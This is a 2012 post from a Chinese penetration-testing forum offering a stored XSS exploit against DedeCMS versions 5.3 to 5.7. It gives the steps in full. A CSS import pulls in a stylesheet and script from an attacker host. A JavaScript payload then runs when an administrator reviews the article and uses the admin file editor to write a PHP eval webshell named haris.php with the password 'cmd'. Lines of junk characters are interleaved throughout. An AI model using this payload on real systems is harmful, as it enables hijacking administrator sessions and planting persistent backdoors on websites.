中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
) m( P1 Q; f" l3 z% Y
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
+ M4 C8 R, i2 L% s, b9 F, z' ^
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
% I- K8 U7 o, K
下面说说利用方法。
2 Y1 C# y* U8 e" Z+ P- G9 k3 j
条件有2个:
# Q- C- d9 Y) n' h
1.开启注册
1 l5 _) X8 ]0 |
2.开启投稿
; T3 K# ^, Y0 N. s5 A% B
注册会员----发表文章
0 G7 n) W/ F5 R" p" M: m- n
内容填写:
9 m1 H& z2 s C' J
复制代码
- g+ R/ A# p% {/ b1 E! N
<style>@im\port'\
http://xxx.com/xss.css';
</style>
/ L: G: D) v8 ?6 i+ v
新建XSS.Css
! V c0 r4 n0 L9 O
复制代码
3 E7 K/ C8 Z* h$ o; }" D
.body{
* k8 Y% H% v8 y. x, E
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
" f( b( ^( E# @0 f4 ~* s3 d
新建xss.js 内容为
7 y/ W0 X! a: u
复制代码
7 v3 W- p" |% l# E* Q. A2 y
1.var request = false;
. }: R; c' F( }
2.if(window.XMLHttpRequest) {
- X" I' ?& p3 Y3 x
3.request = new XMLHttpRequest();
& |6 u; h5 r- r: [' L
4.if(request.overrideMimeType) {
3 p5 N8 E! P9 m) m2 J, d
5.request.overrideMimeType('text/xml');
& ? S4 Z5 s0 X' R2 B
6.}
/ c- p4 A+ \. a1 Q- B
7.} else if(window.ActiveXObject) {
0 D& Y0 m2 i- ], p, @* Z4 |- W
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
' k% ~! G( i; U. |9 b# k
9.for(var i=0; i<versions.length; i++) {
2 C. A( `# J+ K% W
10.try {
0 Q; B7 [7 Z# D" s6 B: ?+ E' ?
11.request = new ActiveXObject(versions);
/ _4 {# U$ e+ p- K% N0 X& H
12.} catch(e) {}
+ m3 @' j1 P/ t4 p& ?) f8 B
13.}
0 [4 F. i/ J* {% \( V2 h' a4 x
14.}
" q& c+ i" I6 P. F0 U
15.xmlhttp=request;
2 u* Y" ?+ E7 y
16.function getFolder( url ){
8 [! }7 S9 s* z! X# ^- f
17. obj = url.split('/')
! I9 {9 q) R6 n& ^8 j
18. return obj[obj.length-2]
4 v: ?! B' [& T5 O! F
19.}
& ?& M. l; {8 t7 t6 f# d: s
20.oUrl = top.location.href;
" n" _, u- `# b+ i2 }1 D
21.u = getFolder(oUrl);
2 m7 I0 n' n' {
22.add_admin();
( P( ]- a2 w m+ d
23.function add_admin(){
4 o/ k7 }! @/ W6 X. I" P6 C
24.var url= "/"+u+"/sys_sql_query.php";
1 f' M0 ^' r& ]3 o. F) n! b% f
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
, H2 }7 N2 p% d/ B% D" h9 J3 w
26.xmlhttp.open("POST", url, true);
+ H% I4 a/ X/ i1 T6 D2 y7 z
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
7 d, q) j5 C4 E ^
28.xmlhttp.setRequestHeader("Content-length", params.length);
( {8 I' M# b' G
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
# q$ n! @, d: m4 J) V9 o0 S+ }; a
30.xmlhttp.send(params);
2 a* X" Q3 P+ k2 r7 v5 ~, d
31.}
?* [5 N1 c5 ^' L3 `( _/ E
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2